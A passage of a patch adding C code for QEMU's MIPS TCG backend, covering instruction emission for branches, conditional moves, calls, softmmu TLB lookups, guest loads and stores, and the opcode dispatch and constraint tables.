branches. + With setcond, we emit between 3 and 10 insns and only 1 branch, + which ought to get better branch prediction. */ + switch (cond) { + case TCG_COND_EQ: + case TCG_COND_NE: + b_cond = cond; + tmp = tcg_out_reduce_eq2(s, TCG_TMP0, TCG_TMP1, al, ah, bl, bh); + break; + + default: + /* Minimize code size by preferring a compare not requiring INV. 
*/ + if (mips_cmp_map[cond] & MIPS_CMP_INV) { + cond = tcg_invert_cond(cond); + b_cond = TCG_COND_EQ; + } + tcg_out_setcond2(s, cond, tmp, al, ah, bl, bh); + break; + } + + tcg_out_brcond(s, b_cond, tmp, TCG_REG_ZERO, label_index); +} + +static void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, TCGReg c2, TCGReg v) +{ + MIPSInsn m_opc = OPC_MOVN; + + switch (cond) { + case TCG_COND_EQ: + m_opc = OPC_MOVZ; + /* FALLTHRU */ + case TCG_COND_NE: + if (c2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, TCG_TMP0, c1, c2); + c1 = TCG_TMP0; + } + break; + + default: + /* Minimize code size by preferring a compare not requiring INV. */ + if (mips_cmp_map[cond] & MIPS_CMP_INV) { + cond = tcg_invert_cond(cond); + m_opc = OPC_MOVZ; + } + tcg_out_setcond(s, cond, TCG_TMP0, c1, c2); + c1 = TCG_TMP0; + break; + } + + tcg_out_opc_reg(s, m_opc, ret, v, c1); +} + +static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail) +{ + /* Note that the ABI requires the called function's address to be + loaded into T9, even if a direct branch is in range. */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T9, (uintptr_t)arg); + + /* But do try a direct branch, allowing the cpu better insn prefetch. 
*/ + if (tail) { + if (!tcg_out_opc_jmp(s, OPC_J, arg)) { + tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_T9, 0); + } + } else { + if (!tcg_out_opc_jmp(s, OPC_JAL, arg)) { + tcg_out_opc_reg(s, OPC_JALR, TCG_REG_RA, TCG_REG_T9, 0); + } + } +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg) +{ + tcg_out_call_int(s, arg, false); + tcg_out_nop(s); +} + +#if defined(CONFIG_SOFTMMU) +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; + +/* Helper routines for marshalling helper function arguments into + * the correct registers and stack. + * I is where we want to put this argument, and is updated and returned + * for the next call. ARG is the argument itself. + * + * We provide routines for arguments which are: immediate, 32 bit + * value in register, 16 and 8 bit values in register (which must be zero + * extended before use) and 64 bit value in a lo:hi register pair. 
+ */ + +static int tcg_out_call_iarg_reg(TCGContext *s, int i, TCGReg arg) +{ + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tcg_out_mov(s, TCG_TYPE_REG, tcg_target_call_iarg_regs[i], arg); + } else { + tcg_out_st(s, TCG_TYPE_REG, arg, TCG_REG_SP, 4 * i); + } + return i + 1; +} + +static int tcg_out_call_iarg_reg8(TCGContext *s, int i, TCGReg arg) +{ + TCGReg tmp = TCG_TMP0; + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xff); + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_reg16(TCGContext *s, int i, TCGReg arg) +{ + TCGReg tmp = TCG_TMP0; + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xffff); + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_imm(TCGContext *s, int i, TCGArg arg) +{ + TCGReg tmp = TCG_TMP0; + if (arg == 0) { + tmp = TCG_REG_ZERO; + } else { + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_movi(s, TCG_TYPE_REG, tmp, arg); + } + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_reg2(TCGContext *s, int i, TCGReg al, TCGReg ah) +{ + i = (i + 1) & ~1; + i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? ah : al)); + i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? al : ah)); + return i; +} + +/* Perform the tlb comparison operation. The complete host address is + placed in BASE. Clobbers AT, T0, A0. */ +static void tcg_out_tlb_load(TCGContext *s, TCGReg base, TCGReg addrl, + TCGReg addrh, int mem_index, TCGMemOp s_bits, + tcg_insn_unit *label_ptr[2], bool is_load) +{ + int cmp_off + = (is_load + ? 
offsetof(CPUArchState, tlb_table[mem_index][0].addr_read) + : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write)); + int add_off = offsetof(CPUArchState, tlb_table[mem_index][0].addend); + + tcg_out_opc_sa(s, OPC_SRL, TCG_REG_A0, addrl, + TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); + tcg_out_opc_imm(s, OPC_ANDI, TCG_REG_A0, TCG_REG_A0, + (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS); + tcg_out_opc_reg(s, OPC_ADDU, TCG_REG_A0, TCG_REG_A0, TCG_AREG0); + + /* Compensate for very large offsets. */ + if (add_off >= 0x8000) { + /* Most target env are smaller than 32k; none are larger than 64k. + Simplify the logic here merely to offset by 0x7ff0, giving us a + range just shy of 64k. Check this assumption. */ + QEMU_BUILD_BUG_ON(offsetof(CPUArchState, + tlb_table[NB_MMU_MODES - 1][1]) + > 0x7ff0 + 0x7fff); + tcg_out_opc_imm(s, OPC_ADDIU, TCG_REG_A0, TCG_REG_A0, 0x7ff0); + cmp_off -= 0x7ff0; + add_off -= 0x7ff0; + } + + /* Load the tlb comparator. */ + tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, TCG_REG_A0, cmp_off + LO_OFF); + if (TARGET_LONG_BITS == 64) { + tcg_out_opc_imm(s, OPC_LW, base, TCG_REG_A0, cmp_off + HI_OFF); + } + + /* Mask the page bits, keeping the alignment bits to compare against. + In between, load the tlb addend for the fast path. 
*/ + tcg_out_movi(s, TCG_TYPE_I32, TCG_TMP1, + TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + tcg_out_opc_imm(s, OPC_LW, TCG_REG_A0, TCG_REG_A0, add_off); + tcg_out_opc_reg(s, OPC_AND, TCG_TMP1, TCG_TMP1, addrl); + + label_ptr[0] = s->code_ptr; + tcg_out_opc_br(s, OPC_BNE, TCG_TMP1, TCG_TMP0); + + if (TARGET_LONG_BITS == 64) { + /* delay slot */ + tcg_out_nop(s); + + label_ptr[1] = s->code_ptr; + tcg_out_opc_br(s, OPC_BNE, addrh, base); + } + + /* delay slot */ + tcg_out_opc_reg(s, OPC_ADDU, base, TCG_REG_A0, addrl); +} + +static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOp opc, + TCGReg datalo, TCGReg datahi, + TCGReg addrlo, TCGReg addrhi, + int mem_index, void *raddr, + tcg_insn_unit *label_ptr[2]) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = datalo; + label->datahi_reg = datahi; + label->addrlo_reg = addrlo; + label->addrhi_reg = addrhi; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr[0]; + if (TARGET_LONG_BITS == 64) { + label->label_ptr[1] = label_ptr[1]; + } +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGReg v0; + int i; + + /* resolve label address */ + reloc_pc16(l->label_ptr[0], s->code_ptr); + if (TARGET_LONG_BITS == 64) { + reloc_pc16(l->label_ptr[1], s->code_ptr); + } + + i = 1; + if (TARGET_LONG_BITS == 64) { + i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); + } else { + i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); + } + i = tcg_out_call_iarg_imm(s, i, l->mem_index); + i = tcg_out_call_iarg_imm(s, i, (intptr_t)l->raddr); + tcg_out_call_int(s, qemu_ld_helpers[opc], false); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); + + v0 = l->datalo_reg; + if ((opc & MO_SIZE) == MO_64) { + /* We eliminated V0 from the possible output registers, so it + cannot be clobbered here. So we must move V1 first. 
*/ + if (MIPS_BE) { + tcg_out_mov(s, TCG_TYPE_I32, v0, TCG_REG_V1); + v0 = l->datahi_reg; + } else { + tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_V1); + } + } + + reloc_pc16(s->code_ptr, l->raddr); + tcg_out_opc_br(s, OPC_BEQ, TCG_REG_ZERO, TCG_REG_ZERO); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_REG, v0, TCG_REG_V0); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGMemOp s_bits = opc & MO_SIZE; + int i; + + /* resolve label address */ + reloc_pc16(l->label_ptr[0], s->code_ptr); + if (TARGET_LONG_BITS == 64) { + reloc_pc16(l->label_ptr[1], s->code_ptr); + } + + i = 1; + if (TARGET_LONG_BITS == 64) { + i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); + } else { + i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); + } + switch (s_bits) { + case MO_8: + i = tcg_out_call_iarg_reg8(s, i, l->datalo_reg); + break; + case MO_16: + i = tcg_out_call_iarg_reg16(s, i, l->datalo_reg); + break; + case MO_32: + i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); + break; + case MO_64: + i = tcg_out_call_iarg_reg2(s, i, l->datalo_reg, l->datahi_reg); + break; + default: + tcg_abort(); + } + i = tcg_out_call_iarg_imm(s, i, l->mem_index); + + /* Tail call to the store helper. Thus force the return address + computation to take place in the return address register. 
*/ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)l->raddr); + i = tcg_out_call_iarg_reg(s, i, TCG_REG_RA); + tcg_out_call_int(s, qemu_st_helpers[opc], true); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); +} +#endif + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, TCGMemOp opc) +{ + switch (opc) { + case MO_UB: + tcg_out_opc_imm(s, OPC_LBU, datalo, base, 0); + break; + case MO_SB: + tcg_out_opc_imm(s, OPC_LB, datalo, base, 0); + break; + case MO_UW | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); + tcg_out_bswap16(s, datalo, TCG_TMP1); + break; + case MO_UW: + tcg_out_opc_imm(s, OPC_LHU, datalo, base, 0); + break; + case MO_SW | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); + tcg_out_bswap16s(s, datalo, TCG_TMP1); + break; + case MO_SW: + tcg_out_opc_imm(s, OPC_LH, datalo, base, 0); + break; + case MO_UL | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, 0); + tcg_out_bswap32(s, datalo, TCG_TMP1); + break; + case MO_UL: + tcg_out_opc_imm(s, OPC_LW, datalo, base, 0); + break; + case MO_Q | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, HI_OFF); + tcg_out_bswap32(s, datalo, TCG_TMP1); + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, LO_OFF); + tcg_out_bswap32(s, datahi, TCG_TMP1); + break; + case MO_Q: + tcg_out_opc_imm(s, OPC_LW, datalo, base, LO_OFF); + tcg_out_opc_imm(s, OPC_LW, datahi, base, HI_OFF); + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg addr_regl, addr_regh QEMU_UNUSED_VAR; + TCGReg data_regl, data_regh; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + tcg_insn_unit *label_ptr[2]; + int mem_index; + TCGMemOp s_bits; +#endif + /* Note that we've eliminated V0 from the output registers, + so we won't overwrite the base register during loading. */ + TCGReg base = TCG_REG_V0; + + data_regl = *args++; + data_regh = (is_64 ? 
*args++ : 0); + addr_regl = *args++; + addr_regh = (TARGET_LONG_BITS == 64 ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args; + s_bits = opc & MO_SIZE; + + tcg_out_tlb_load(s, base, addr_regl, addr_regh, mem_index, + s_bits, label_ptr, 1); + tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc); + add_qemu_ldst_label(s, 1, opc, data_regl, data_regh, addr_regl, addr_regh, + mem_index, s->code_ptr, label_ptr); +#else + if (GUEST_BASE == 0 && data_regl != addr_regl) { + base = addr_regl; + } else if (GUEST_BASE == (int16_t)GUEST_BASE) { + tcg_out_opc_imm(s, OPC_ADDIU, base, addr_regl, GUEST_BASE); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, base, GUEST_BASE); + tcg_out_opc_reg(s, OPC_ADDU, base, base, addr_regl); + } + tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc); +#endif +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, TCGMemOp opc) +{ + switch (opc) { + case MO_8: + tcg_out_opc_imm(s, OPC_SB, datalo, base, 0); + break; + + case MO_16 | MO_BSWAP: + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, datalo, 0xffff); + tcg_out_bswap16(s, TCG_TMP1, TCG_TMP1); + datalo = TCG_TMP1; + /* FALLTHRU */ + case MO_16: + tcg_out_opc_imm(s, OPC_SH, datalo, base, 0); + break; + + case MO_32 | MO_BSWAP: + tcg_out_bswap32(s, TCG_TMP1, datalo); + datalo = TCG_TMP1; + /* FALLTHRU */ + case MO_32: + tcg_out_opc_imm(s, OPC_SW, datalo, base, 0); + break; + + case MO_64 | MO_BSWAP: + tcg_out_bswap32(s, TCG_TMP1, datalo); + tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, HI_OFF); + tcg_out_bswap32(s, TCG_TMP1, datahi); + tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, LO_OFF); + break; + case MO_64: + tcg_out_opc_imm(s, OPC_SW, datalo, base, LO_OFF); + tcg_out_opc_imm(s, OPC_SW, datahi, base, HI_OFF); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, + TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, + bool cbh, bool is_sub) +{ + TCGReg th = 
TCG_TMP1; + + /* If we have a negative constant such that negating it would + make the high part zero, we can (usually) eliminate one insn. */ + if (cbl && cbh && bh == -1 && bl != 0) { + bl = -bl; + bh = 0; + is_sub = !is_sub; + } + + /* By operating on the high part first, we get to use the final + carry operation to move back from the temporary. */ + if (!cbh) { + tcg_out_opc_reg(s, (is_sub ? OPC_SUBU : OPC_ADDU), th, ah, bh); + } else if (bh != 0 || ah == rl) { + tcg_out_opc_imm(s, OPC_ADDIU, th, ah, (is_sub ? -bh : bh)); + } else { + th = ah; + } + + /* Note that tcg optimization should eliminate the bl == 0 case. */ + if (is_sub) { + if (cbl) { + tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, al, bl); + tcg_out_opc_imm(s, OPC_ADDIU, rl, al, -bl); + } else { + tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, al, bl); + tcg_out_opc_reg(s, OPC_SUBU, rl, al, bl); + } + tcg_out_opc_reg(s, OPC_SUBU, rh, th, TCG_TMP0); + } else { + if (cbl) { + tcg_out_opc_imm(s, OPC_ADDIU, rl, al, bl); + tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, rl, bl); + } else { + tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); + tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, rl, (rl == bl ? al : bl)); + } + tcg_out_opc_reg(s, OPC_ADDU, rh, th, TCG_TMP0); + } +} + +static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg addr_regl, addr_regh QEMU_UNUSED_VAR; + TCGReg data_regl, data_regh, base; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + tcg_insn_unit *label_ptr[2]; + int mem_index; + TCGMemOp s_bits; +#endif + + data_regl = *args++; + data_regh = (is_64 ? *args++ : 0); + addr_regl = *args++; + addr_regh = (TARGET_LONG_BITS == 64 ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args; + s_bits = opc & 3; + + /* Note that we eliminated the helper's address argument, + so we can reuse that for the base. */ + base = (TARGET_LONG_BITS == 32 ? 
TCG_REG_A1 : TCG_REG_A2); + tcg_out_tlb_load(s, base, addr_regl, addr_regh, mem_index, + s_bits, label_ptr, 0); + tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); + add_qemu_ldst_label(s, 0, opc, data_regl, data_regh, addr_regl, addr_regh, + mem_index, s->code_ptr, label_ptr); +#else + if (GUEST_BASE == 0) { + base = addr_regl; + } else { + base = TCG_REG_A0; + if (GUEST_BASE == (int16_t)GUEST_BASE) { + tcg_out_opc_imm(s, OPC_ADDIU, base, addr_regl, GUEST_BASE); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, base, GUEST_BASE); + tcg_out_opc_reg(s, OPC_ADDU, base, base, addr_regl); + } + } + tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); +#endif +} + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + MIPSInsn i1, i2; + TCGArg a0, a1, a2; + int c2; + + a0 = args[0]; + a1 = args[1]; + a2 = args[2]; + c2 = const_args[2]; + + switch (opc) { + case INDEX_op_exit_tb: + { + TCGReg b0 = TCG_REG_ZERO; + + if (a0 & ~0xffff) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_V0, a0 & ~0xffff); + b0 = TCG_REG_V0; + } + if (!tcg_out_opc_jmp(s, OPC_J, tb_ret_addr)) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, + (uintptr_t)tb_ret_addr); + tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); + } + tcg_out_opc_imm(s, OPC_ORI, TCG_REG_V0, b0, a0 & 0xffff); + } + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* direct jump method */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* Avoid clobbering the address during retranslation. 
*/ + tcg_out32(s, OPC_J | (*(uint32_t *)s->code_ptr & 0x3ffffff)); + } else { + /* indirect jump method */ + tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_REG_ZERO, + (uintptr_t)(s->tb_next + a0)); + tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); + } + tcg_out_nop(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + case INDEX_op_br: + tcg_out_brcond(s, TCG_COND_EQ, TCG_REG_ZERO, TCG_REG_ZERO, a0); + break; + + case INDEX_op_ld8u_i32: + i1 = OPC_LBU; + goto do_ldst; + case INDEX_op_ld8s_i32: + i1 = OPC_LB; + goto do_ldst; + case INDEX_op_ld16u_i32: + i1 = OPC_LHU; + goto do_ldst; + case INDEX_op_ld16s_i32: + i1 = OPC_LH; + goto do_ldst; + case INDEX_op_ld_i32: + i1 = OPC_LW; + goto do_ldst; + case INDEX_op_st8_i32: + i1 = OPC_SB; + goto do_ldst; + case INDEX_op_st16_i32: + i1 = OPC_SH; + goto do_ldst; + case INDEX_op_st_i32: + i1 = OPC_SW; + do_ldst: + tcg_out_ldst(s, i1, a0, a1, a2); + break; + + case INDEX_op_add_i32: + i1 = OPC_ADDU, i2 = OPC_ADDIU; + goto do_binary; + case INDEX_op_or_i32: + i1 = OPC_OR, i2 = OPC_ORI; + goto do_binary; + case INDEX_op_xor_i32: + i1 = OPC_XOR, i2 = OPC_XORI; + do_binary: + if (c2) { + tcg_out_opc_imm(s, i2, a0, a1, a2); + break; + } + do_binaryv: + tcg_out_opc_reg(s, i1, a0, a1, a2); + break; + + case INDEX_op_sub_i32: + if (c2) { + tcg_out_opc_imm(s, OPC_ADDIU, a0, a1, -a2); + break; + } + i1 = OPC_SUBU; + goto do_binary; + case INDEX_op_and_i32: + if (c2 && a2 != (uint16_t)a2) { + int msb = ctz32(~a2) - 1; + assert(use_mips32r2_instructions); + assert(is_p2m1(a2)); + tcg_out_opc_bf(s, OPC_EXT, a0, a1, msb, 0); + break; + } + i1 = OPC_AND, i2 = OPC_ANDI; + goto do_binary; + case INDEX_op_nor_i32: + i1 = OPC_NOR; + goto do_binaryv; + + case INDEX_op_mul_i32: + if (use_mips32_instructions) { + tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); + break; + } + i1 = OPC_MULT, i2 = OPC_MFLO; + goto do_hilo1; + case INDEX_op_mulsh_i32: + i1 = OPC_MULT, i2 = OPC_MFHI; + goto do_hilo1; + case INDEX_op_muluh_i32: + i1 = OPC_MULTU, i2 = 
OPC_MFHI; + goto do_hilo1; + case INDEX_op_div_i32: + i1 = OPC_DIV, i2 = OPC_MFLO; + goto do_hilo1; + case INDEX_op_divu_i32: + i1 = OPC_DIVU, i2 = OPC_MFLO; + goto do_hilo1; + case INDEX_op_rem_i32: + i1 = OPC_DIV, i2 = OPC_MFHI; + goto do_hilo1; + case INDEX_op_remu_i32: + i1 = OPC_DIVU, i2 = OPC_MFHI; + do_hilo1: + tcg_out_opc_reg(s, i1, 0, a1, a2); + tcg_out_opc_reg(s, i2, a0, 0, 0); + break; + + case INDEX_op_muls2_i32: + i1 = OPC_MULT; + goto do_hilo2; + case INDEX_op_mulu2_i32: + i1 = OPC_MULTU; + do_hilo2: + tcg_out_opc_reg(s, i1, 0, a2, args[3]); + tcg_out_opc_reg(s, OPC_MFLO, a0, 0, 0); + tcg_out_opc_reg(s, OPC_MFHI, a1, 0, 0); + break; + + case INDEX_op_not_i32: + i1 = OPC_NOR; + goto do_unary; + case INDEX_op_bswap16_i32: + i1 = OPC_WSBH; + goto do_unary; + case INDEX_op_ext8s_i32: + i1 = OPC_SEB; + goto do_unary; + case INDEX_op_ext16s_i32: + i1 = OPC_SEH; + do_unary: + tcg_out_opc_reg(s, i1, a0, TCG_REG_ZERO, a1); + break; + + case INDEX_op_sar_i32: + i1 = OPC_SRAV, i2 = OPC_SRA; + goto do_shift; + case INDEX_op_shl_i32: + i1 = OPC_SLLV, i2 = OPC_SLL; + goto do_shift; + case INDEX_op_shr_i32: + i1 = OPC_SRLV, i2 = OPC_SRL; + goto do_shift; + case INDEX_op_rotr_i32: + i1 = OPC_ROTRV, i2 = OPC_ROTR; + do_shift: + if (c2) { + tcg_out_opc_sa(s, i2, a0, a1, a2); + } else { + tcg_out_opc_reg(s, i1, a0, a2, a1); + } + break; + case INDEX_op_rotl_i32: + if (c2) { + tcg_out_opc_sa(s, OPC_ROTR, a0, a1, 32 - a2); + } else { + tcg_out_opc_reg(s, OPC_SUBU, TCG_TMP0, TCG_REG_ZERO, a2); + tcg_out_opc_reg(s, OPC_ROTRV, a0, TCG_TMP0, a1); + } + break; + + case INDEX_op_bswap32_i32: + tcg_out_opc_reg(s, OPC_WSBH, a0, 0, a1); + tcg_out_opc_sa(s, OPC_ROTR, a0, a0, 16); + break; + + case INDEX_op_deposit_i32: + tcg_out_opc_bf(s, OPC_INS, a0, a2, args[3] + args[4] - 1, args[3]); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, a2, a0, a1, args[3]); + break; + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], args[5]); + break; + + case 
INDEX_op_movcond_i32: + tcg_out_movcond(s, args[5], a0, a1, a2, args[3]); + break; + + case INDEX_op_setcond_i32: + tcg_out_setcond(s, args[3], a0, a1, a2); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, true); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, false); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, true); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], + const_args[4], const_args[5], false); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], + const_args[4], const_args[5], true); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef mips_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_mul_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_muls2_i32, { "r", "r", "rZ", "rZ" } }, + { INDEX_op_mulu2_i32, { "r", "r", "rZ", "rZ" } }, + { INDEX_op_mulsh_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_muluh_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_div_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_divu_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_rem_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_remu_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_sub_i32, { "r", "rZ", "rN" } }, + + { INDEX_op_and_i32, { "r", "rZ", "rIK" } }, + { INDEX_op_nor_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_not_i32, { "r", "rZ" } }, + { INDEX_op_or_i32, { "r", "rZ", "rIZ" } }, + { INDEX_op_xor_i32, { "r", "rZ", "rIZ" } }, + + { INDEX_op_shl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_sar_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i32, { "r", "rZ", "ri" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_ext8s_i32, { "r", "rZ" } }, + { INDEX_op_ext16s_i32, { "r", "rZ" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rZ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rZ", "rZ", "0" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_setcond2_i32, { "r", "rZ", "rZ", "rZ", "rZ" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rN", "rN" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", "rZ", 
"rN", "rN" } }, + { INDEX_op_brcond2_i32, { "rZ", "rZ", "rZ", "rZ" } }, + +#if TARGET_LONG_BITS == 32 + { INDEX_op_qemu_ld_i32, { "L", "lZ" } }, + { INDEX_op_qemu_st_i32, { "SZ", "SZ" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "lZ" } }, + { INDEX_op_qemu_st_i64, { "SZ", "SZ", "SZ" } }, +#else + { INDEX_op_qemu_ld_i32, { "L", "lZ", "lZ" } }, + { INDEX_op_qemu_st_i32, { "SZ", "SZ", "SZ" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "lZ", "lZ" } }, + { INDEX_op_qemu_st_i64, { "SZ", "SZ", "SZ", "SZ" } }, +#endif + { -1 }, +}; + +static int tcg_target_callee_save_regs[] = { + TCG_REG_S0, /* used for the global env (TCG_AREG0) */ + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_S8, + TCG_REG_RA, /* should be last for ABI compliance */ +}; + +/* 